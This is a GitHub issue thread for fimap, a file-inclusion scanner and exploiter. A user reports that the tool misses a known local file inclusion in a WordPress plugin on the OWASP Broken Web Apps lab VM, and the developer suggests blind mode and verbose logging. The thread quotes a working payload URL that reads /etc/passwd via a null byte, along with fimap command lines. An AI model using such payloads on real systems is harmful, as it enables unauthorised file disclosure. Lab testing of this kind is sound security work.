kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0
521 stars 99 forks source link

Wordpress plugin LFI not discovered #66

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
I'm trying out your tool fimap and I'm trying it against a vulnerable Wordpress 
plugin on the OWASP Broken Web Apps virtual machine:
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

The plugin can be exploited with
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrow
ser.php?myPath=/etc/passwd%00

However, fimap does not discover this:
root@bt:~/fimap_alpha_v09# ./fimap.py -u 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
[19:36:02] [OUT] Inspecting URL 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'...
[19:36:02] [INFO] Fiddling around with URL...
[19:36:02] [WARN] HTTP Error 500: Internal Server Error
Target URL isn't affected by any file inclusion bug :(

Running fimap on Backtrack 5.

Original issue reported on code.google.com by treh...@gmail.com on 13 Jan 2012 at 10:17

GoogleCodeExporter commented 9 years ago
Hi!

Can you try enabling blindmode?
Just add the "-b" parameter and see if it works.

What I don't like about your log is the HTTP Error 500.
Also enable  more logging to see what's going on there. -v 6 for example.

-imax.

Original comment by fimap....@gmail.com on 21 Jan 2012 at 8:38

GoogleCodeExporter commented 9 years ago
Hello,

-b did not resolve this issue:

./fimap.py -b -u 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
[21:18:45] [OUT] Inspecting URL 
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'...
[21:18:45] [INFO] Fiddling around with URL...
[21:18:45] [WARN] HTTP Error 500: Internal Server Error
[21:18:45] [INFO] Sniper failed. Going blind...
[21:18:45] [WARN] HTTP Error 500: Internal Server Error
Target URL isn't affected by any file inclusion bug :(

Best regards,
Tomas

Original comment by treh...@gmail.com on 9 Feb 2012 at 9:23

GoogleCodeExporter commented 9 years ago
Hey man,

Sorry for my late response.
I think it has something todo with the error code.
The default behaviour is to cancel any test if there was an error code.
Maybe that was a stupid idea.

However I will take a look whats going wrong there.

Thank you and sorry for my late response,
-imax.

Original comment by fimap....@gmail.com on 12 Apr 2012 at 8:33